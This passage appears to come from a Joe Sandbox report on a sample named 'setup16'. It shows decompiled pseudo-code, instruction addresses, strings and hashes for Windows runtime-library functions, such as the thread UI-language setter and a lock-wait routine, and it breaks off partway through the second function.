                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FFAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                                                        			E049FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E049DEEF0(0x4ab7b60);
					_t134 =  *0x4ab7b84; // 0x77577b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4ab7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4ab7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E049D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E049D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04A68938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E049CB150();
													}
													_t116 = E04A66D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E049D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4ab8638; // 0xa80410
																	_t122 = L049D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E049D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E049D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L049FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L049D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E049FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E049FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E049FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E049FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E049FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4ab7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4ab7b84 = _t75;
						_t73 = E049DEB70(_t134, 0x4ab7b60);
						if( *0x4ab7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E049DFF60( *0x4ab7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                                                                                                                                        0x049ffab0
                                                                                                                                                                                                        0x049ffab2
                                                                                                                                                                                                        0x049ffab3
                                                                                                                                                                                                        0x049ffab4
                                                                                                                                                                                                        0x049ffabc
                                                                                                                                                                                                        0x049ffac0
                                                                                                                                                                                                        0x049ffb14
                                                                                                                                                                                                        0x049ffb17
                                                                                                                                                                                                        0x049ffac2
                                                                                                                                                                                                        0x049ffac8
                                                                                                                                                                                                        0x049ffacd
                                                                                                                                                                                                        0x049ffad3
                                                                                                                                                                                                        0x049ffad3
                                                                                                                                                                                                        0x049ffadd
                                                                                                                                                                                                        0x049ffb18
                                                                                                                                                                                                        0x049ffb1b
                                                                                                                                                                                                        0x049ffb1d
                                                                                                                                                                                                        0x049ffb1e
                                                                                                                                                                                                        0x049ffb1f
                                                                                                                                                                                                        0x049ffb20
                                                                                                                                                                                                        0x049ffb21
                                                                                                                                                                                                        0x049ffb22
                                                                                                                                                                                                        0x049ffb23
                                                                                                                                                                                                        0x049ffb24
                                                                                                                                                                                                        0x049ffb25
                                                                                                                                                                                                        0x049ffb26
                                                                                                                                                                                                        0x049ffb27
                                                                                                                                                                                                        0x049ffb28
                                                                                                                                                                                                        0x049ffb29
                                                                                                                                                                                                        0x049ffb2a
                                                                                                                                                                                                        0x049ffb2b
                                                                                                                                                                                                        0x049ffb2c
                                                                                                                                                                                                        0x049ffb2d
                                                                                                                                                                                                        0x049ffb2e
                                                                                                                                                                                                        0x049ffb2f
                                                                                                                                                                                                        0x049ffb3a
                                                                                                                                                                                                        0x049ffb3b
                                                                                                                                                                                                        0x049ffb3e
                                                                                                                                                                                                        0x049ffb41
                                                                                                                                                                                                        0x049ffb44
                                                                                                                                                                                                        0x049ffb47
                                                                                                                                                                                                        0x049ffb4a
                                                                                                                                                                                                        0x049ffb4d
                                                                                                                                                                                                        0x049ffb53
                                                                                                                                                                                                        0x04a3bdcb
                                                                                                                                                                                                        0x04a3bdcb
                                                                                                                                                                                                        0x049ffb59
                                                                                                                                                                                                        0x049ffb5b
                                                                                                                                                                                                        0x049ffb5b
                                                                                                                                                                                                        0x049ffb5e
                                                                                                                                                                                                        0x04a3bdd5
                                                                                                                                                                                                        0x04a3bdd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bdda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bdda
                                                                                                                                                                                                        0x049ffb64
                                                                                                                                                                                                        0x049ffb64
                                                                                                                                                                                                        0x049ffb64
                                                                                                                                                                                                        0x049ffb67
                                                                                                                                                                                                        0x049ffb6e
                                                                                                                                                                                                        0x049ffb70
                                                                                                                                                                                                        0x049ffb72
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffb78
                                                                                                                                                                                                        0x049ffb7a
                                                                                                                                                                                                        0x049ffb7a
                                                                                                                                                                                                        0x049ffb7d
                                                                                                                                                                                                        0x049ffb80
                                                                                                                                                                                                        0x04a3bddf
                                                                                                                                                                                                        0x04a3bde1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bde3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bde3
                                                                                                                                                                                                        0x049ffb86
                                                                                                                                                                                                        0x049ffb86
                                                                                                                                                                                                        0x049ffb86
                                                                                                                                                                                                        0x049ffb8b
                                                                                                                                                                                                        0x049ffb90
                                                                                                                                                                                                        0x049ffb92
                                                                                                                                                                                                        0x049ffb94
                                                                                                                                                                                                        0x049ffb9a
                                                                                                                                                                                                        0x049ffb9b
                                                                                                                                                                                                        0x049ffba1
                                                                                                                                                                                                        0x04a3bde8
                                                                                                                                                                                                        0x04a3bdeb
                                                                                                                                                                                                        0x04a3bded
                                                                                                                                                                                                        0x04a3beb5
                                                                                                                                                                                                        0x04a3beb5
                                                                                                                                                                                                        0x04a3bebb
                                                                                                                                                                                                        0x04a3bebd
                                                                                                                                                                                                        0x04a3bec3
                                                                                                                                                                                                        0x04a3bed2
                                                                                                                                                                                                        0x04a3bedd
                                                                                                                                                                                                        0x04a3bedd
                                                                                                                                                                                                        0x04a3beed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bdf3
                                                                                                                                                                                                        0x04a3bdfe
                                                                                                                                                                                                        0x04a3be06
                                                                                                                                                                                                        0x04a3be0b
                                                                                                                                                                                                        0x04a3be0d
                                                                                                                                                                                                        0x04a3be0f
                                                                                                                                                                                                        0x04a3be14
                                                                                                                                                                                                        0x04a3be19
                                                                                                                                                                                                        0x04a3be20
                                                                                                                                                                                                        0x04a3be25
                                                                                                                                                                                                        0x04a3be27
                                                                                                                                                                                                        0x04a3be35
                                                                                                                                                                                                        0x04a3be39
                                                                                                                                                                                                        0x04a3be46
                                                                                                                                                                                                        0x04a3be4f
                                                                                                                                                                                                        0x04a3be54
                                                                                                                                                                                                        0x04a3be56
                                                                                                                                                                                                        0x04a3bef8
                                                                                                                                                                                                        0x04a3bef8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3be5c
                                                                                                                                                                                                        0x04a3be5c
                                                                                                                                                                                                        0x04a3be60
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3be66
                                                                                                                                                                                                        0x04a3be66
                                                                                                                                                                                                        0x04a3be7f
                                                                                                                                                                                                        0x04a3be84
                                                                                                                                                                                                        0x04a3be87
                                                                                                                                                                                                        0x04a3be89
                                                                                                                                                                                                        0x04a3be8b
                                                                                                                                                                                                        0x04a3be99
                                                                                                                                                                                                        0x04a3be9d
                                                                                                                                                                                                        0x04a3bea0
                                                                                                                                                                                                        0x04a3beac
                                                                                                                                                                                                        0x04a3beaf
                                                                                                                                                                                                        0x04a3beb1
                                                                                                                                                                                                        0x04a3beb3
                                                                                                                                                                                                        0x04a3beb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bea2
                                                                                                                                                                                                        0x04a3bea2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bea2
                                                                                                                                                                                                        0x04a3be8d
                                                                                                                                                                                                        0x04a3be8d
                                                                                                                                                                                                        0x04a3be92
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3be92
                                                                                                                                                                                                        0x04a3be8b
                                                                                                                                                                                                        0x04a3be60
                                                                                                                                                                                                        0x04a3be3b
                                                                                                                                                                                                        0x04a3be3b
                                                                                                                                                                                                        0x04a3be3e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3be40
                                                                                                                                                                                                        0x04a3be40
                                                                                                                                                                                                        0x04a3be44
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3be44
                                                                                                                                                                                                        0x04a3be3e
                                                                                                                                                                                                        0x04a3be29
                                                                                                                                                                                                        0x04a3be29
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3be29
                                                                                                                                                                                                        0x04a3be27
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffba7
                                                                                                                                                                                                        0x049ffba7
                                                                                                                                                                                                        0x049ffbab
                                                                                                                                                                                                        0x04a3bf02
                                                                                                                                                                                                        0x049ffbb1
                                                                                                                                                                                                        0x049ffbb1
                                                                                                                                                                                                        0x049ffbb8
                                                                                                                                                                                                        0x049ffbbd
                                                                                                                                                                                                        0x049ffbbd
                                                                                                                                                                                                        0x049ffbbf
                                                                                                                                                                                                        0x049ffbbf
                                                                                                                                                                                                        0x049ffbc5
                                                                                                                                                                                                        0x049ffbcb
                                                                                                                                                                                                        0x049ffbf8
                                                                                                                                                                                                        0x049ffbf8
                                                                                                                                                                                                        0x049ffbfa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffc00
                                                                                                                                                                                                        0x049ffc00
                                                                                                                                                                                                        0x049ffc03
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffc09
                                                                                                                                                                                                        0x049ffc09
                                                                                                                                                                                                        0x049ffc0f
                                                                                                                                                                                                        0x049ffc15
                                                                                                                                                                                                        0x049ffc23
                                                                                                                                                                                                        0x049ffc23
                                                                                                                                                                                                        0x049ffc25
                                                                                                                                                                                                        0x049ffc27
                                                                                                                                                                                                        0x049ffc75
                                                                                                                                                                                                        0x049ffc7c
                                                                                                                                                                                                        0x049ffc84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffc29
                                                                                                                                                                                                        0x049ffc29
                                                                                                                                                                                                        0x049ffc2d
                                                                                                                                                                                                        0x049ffc30
                                                                                                                                                                                                        0x04a3bf0f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffc36
                                                                                                                                                                                                        0x049ffc38
                                                                                                                                                                                                        0x049ffc3b
                                                                                                                                                                                                        0x049ffc41
                                                                                                                                                                                                        0x04a3bf17
                                                                                                                                                                                                        0x04a3bf19
                                                                                                                                                                                                        0x04a3bf48
                                                                                                                                                                                                        0x04a3bf4b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bf1b
                                                                                                                                                                                                        0x04a3bf22
                                                                                                                                                                                                        0x04a3bf24
                                                                                                                                                                                                        0x04a3bf26
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bf2c
                                                                                                                                                                                                        0x04a3bf37
                                                                                                                                                                                                        0x04a3bf39
                                                                                                                                                                                                        0x04a3bf3b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bf41
                                                                                                                                                                                                        0x04a3bf41
                                                                                                                                                                                                        0x04a3bf41
                                                                                                                                                                                                        0x04a3bf41
                                                                                                                                                                                                        0x04a3bf45
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3bf45
                                                                                                                                                                                                        0x04a3bf3b
                                                                                                                                                                                                        0x04a3bf26
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffc47
                                                                                                                                                                                                        0x049ffc47
                                                                                                                                                                                                        0x049ffc49
                                                                                                                                                                                                        0x049ffcb2
                                                                                                                                                                                                        0x049ffcb4
                                                                                                                                                                                                        0x049ffcb6
                                                                                                                                                                                                        0x049ffcdc
                                                                                                                                                                                                        0x049ffcdc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffcb8
                                                                                                                                                                                                        0x049ffcc3
                                                                                                                                                                                                        0x049ffcc5
                                                                                                                                                                                                        0x049ffcc7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffcc9
                                                                                                                                                                                                        0x049ffcc9
                                                                                                                                                                                                        0x049ffccd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffccd
                                                                                                                                                                                                        0x049ffcc7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffc4b
                                                                                                                                                                                                        0x049ffc4b
                                                                                                                                                                                                        0x049ffc4e
                                                                                                                                                                                                        0x049ffc4e
                                                                                                                                                                                                        0x049ffc51
                                                                                                                                                                                                        0x049ffc51
                                                                                                                                                                                                        0x049ffc54
                                                                                                                                                                                                        0x049ffc5a
                                                                                                                                                                                                        0x049ffc5c
                                                                                                                                                                                                        0x049ffc5f
                                                                                                                                                                                                        0x049ffc61
                                                                                                                                                                                                        0x049ffc63
                                                                                                                                                                                                        0x049ffc65
                                                                                                                                                                                                        0x049ffc67
                                                                                                                                                                                                        0x049ffc6e
                                                                                                                                                                                                        0x049ffc72
                                                                                                                                                                                                        0x049ffc72
                                                                                                                                                                                                        0x049ffc72
                                                                                                                                                                                                        0x049ffc72
                                                                                                                                                                                                        0x049ffc67
                                                                                                                                                                                                        0x049ffc61
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffc5a
                                                                                                                                                                                                        0x049ffc49
                                                                                                                                                                                                        0x049ffc41
                                                                                                                                                                                                        0x049ffc30
                                                                                                                                                                                                        0x049ffc27
                                                                                                                                                                                                        0x049ffc03
                                                                                                                                                                                                        0x049ffbcd
                                                                                                                                                                                                        0x049ffbd3
                                                                                                                                                                                                        0x049ffbd9
                                                                                                                                                                                                        0x049ffbdc
                                                                                                                                                                                                        0x049ffbde
                                                                                                                                                                                                        0x049ffc99
                                                                                                                                                                                                        0x049ffc9b
                                                                                                                                                                                                        0x049ffc9d
                                                                                                                                                                                                        0x049ffcd5
                                                                                                                                                                                                        0x049ffcd5
                                                                                                                                                                                                        0x049ffc89
                                                                                                                                                                                                        0x049ffc89
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffc9f
                                                                                                                                                                                                        0x049ffc9f
                                                                                                                                                                                                        0x049ffca3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffca3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffbe4
                                                                                                                                                                                                        0x049ffbe4
                                                                                                                                                                                                        0x049ffbe4
                                                                                                                                                                                                        0x049ffbe4
                                                                                                                                                                                                        0x049ffbe9
                                                                                                                                                                                                        0x049ffbf2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffbf2
                                                                                                                                                                                                        0x049ffbde
                                                                                                                                                                                                        0x049ffbcb
                                                                                                                                                                                                        0x049ffbab
                                                                                                                                                                                                        0x049ffc8b
                                                                                                                                                                                                        0x049ffc8b
                                                                                                                                                                                                        0x049ffc8c
                                                                                                                                                                                                        0x049ffb80
                                                                                                                                                                                                        0x049ffb72
                                                                                                                                                                                                        0x049ffb5e
                                                                                                                                                                                                        0x049ffc8d
                                                                                                                                                                                                        0x049ffc91
                                                                                                                                                                                                        0x049ffadf
                                                                                                                                                                                                        0x049ffadf
                                                                                                                                                                                                        0x049ffae1
                                                                                                                                                                                                        0x049ffae4
                                                                                                                                                                                                        0x049ffae7
                                                                                                                                                                                                        0x049ffaec
                                                                                                                                                                                                        0x049ffaf8
                                                                                                                                                                                                        0x049ffb00
                                                                                                                                                                                                        0x049ffb07
                                                                                                                                                                                                        0x049ffb0f
                                                                                                                                                                                                        0x049ffb0f
                                                                                                                                                                                                        0x049ffb07
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffaf8
                                                                                                                                                                                                        0x049ffadd

                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04A3BE0F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                                                                                                                                        • API String ID: 0-865735534
                                                                                                                                                                                                        • Opcode ID: 82a3d3e01786e3ece4ce156a86308d9a4c16ad639d69d5eebf58eaac564374ff
                                                                                                                                                                                                        • Instruction ID: 6921b07cf439ffd8a8154c89ac629ee00341479719dcd0b5717f2016b969f452
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82a3d3e01786e3ece4ce156a86308d9a4c16ad639d69d5eebf58eaac564374ff
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46A11431B006158FEB25DF68C850B7AB3AAAF84715F14457EEA06DB695FB34F801CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049C2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 63%
                                                                                                                                                                                                        			E049C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4ab5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4ab7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04A097C0();
				}
				if( *0x4ab79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4ab79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E049F1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E049E7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04A5FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04A09520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E049FE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04A1DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4ab6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4ab6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04A09980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04A095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E049E7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E049E7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
